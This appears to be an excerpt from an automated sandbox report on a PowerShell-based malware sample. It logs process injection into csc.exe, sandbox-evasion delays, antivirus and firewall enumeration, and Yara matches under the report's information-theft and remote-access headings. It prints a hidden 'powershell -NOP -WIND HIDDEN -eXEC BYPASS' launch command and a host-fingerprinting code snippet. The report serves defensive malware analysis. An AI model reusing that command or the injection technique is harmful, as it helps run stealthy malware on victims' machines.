                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 5740000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 71E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 91E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 5540000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 7210000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 6E70000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 4DA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 6D10000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 6930000 memory reserve | memory write watch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4762Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5117Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 3592Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 6244Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4367Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5377Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5037
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4781
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7928Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7928Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7928Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7932Thread sleep count: 3592 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7932Thread sleep count: 6244 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2004Thread sleep count: 4367 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep count: 5377 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780Thread sleep count: 5037 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 4781 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: powershell.exe, 00000000.00000002.1896657136.000001C2CE012000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeP
                    Source: csc.exe, 00000002.00000003.2148821941.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115682568.00000000052D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll="@
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: stage2.ps1, type: SAMPLE
Source: Yara match File source: amsi64_7548.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 406000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 408000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E00008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 406000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 408000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4CBF008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 406000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 408000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4900008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: csc.exe, 00000002.00000002.4116375776.000000000721B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007211000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\^q
Source: csc.exe, 00000002.00000002.4116375776.000000000721B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007211000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: csc.exe, 00000002.00000003.2148821941.0000000005296000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115682568.0000000005297000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR
Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, IdGenerator.cs .Net Code: Dns.GetHostByName(Dns.GetHostName()) new ManagementObjectSearcher("select * from Win32_Processor").Get().GetEnumerator() Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null)

Remote Access Functionality

Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR
Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
